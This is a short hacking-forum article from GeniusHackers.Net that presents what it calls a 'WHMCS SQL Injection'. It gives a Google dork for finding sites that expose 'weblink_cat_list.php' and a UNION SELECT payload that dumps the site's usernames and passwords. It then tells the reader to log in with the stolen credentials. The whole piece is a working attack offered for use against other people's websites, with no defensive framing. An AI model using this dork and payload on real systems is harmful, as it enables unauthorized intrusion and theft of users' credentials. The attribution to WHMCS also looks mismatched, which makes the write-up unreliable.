WHMCS SQL Injection Vulnerability - Exploits and Vulenrablities - Web Hacking - Hacking - GeniusHackers.Net

Main » Articles » Web Hacking » Exploits and Vulenrablities

WHMCS SQL Injection Vulnerability

Title: WHMCS SQL Injection Vulnerablity

Author: MaX-HaCker

WHMCS SQL Injection Vulnerability. This is a very old vulnerability but still works.

Lets Start

Firstly find a vulnerable site by using Google Dork
inurl:"weblink_cat_list.php?bcat_id="
URL will be something like this

http://www.example.com/oldweb_kroobannok/weblink_cat_list.php?bcat_id=1
Then change the url from

http://www.example.com/oldweb_kroobannok/weblink_cat_list.php?bcat_id=1

to

http://www.example.com/oldweb_kroobannok/weblink_cat_list.php?bcat_id=-1+UNION+SELECT+1,GROUP_concat(id,0x3a,username,0x3a,password),

3,4+from+user

Bang ! All username as well as passwords will be shown. Now login with that credentials.

1
2
3
4
5

Category: Exploits and Vulenrablities | Added by: MaX-HaCker (12.08.25)

Views: 1563 | Rating: 5.0/1

Total comments: 0

Only registered users can add comments.
[ Registration | Login ]

Recommend on Google

Follow @geniushackers

Designed By [#]./3X3.R()()T

Like Us on Facebook

Follow Us on Twitter

Subscribe Us on Youtube

WWW.GeniusHackers.NET © 2024

Founder and CEO of GeniusHackers [#] /3x3.R()()T

Hosted by uCoz

Hosted by uCoz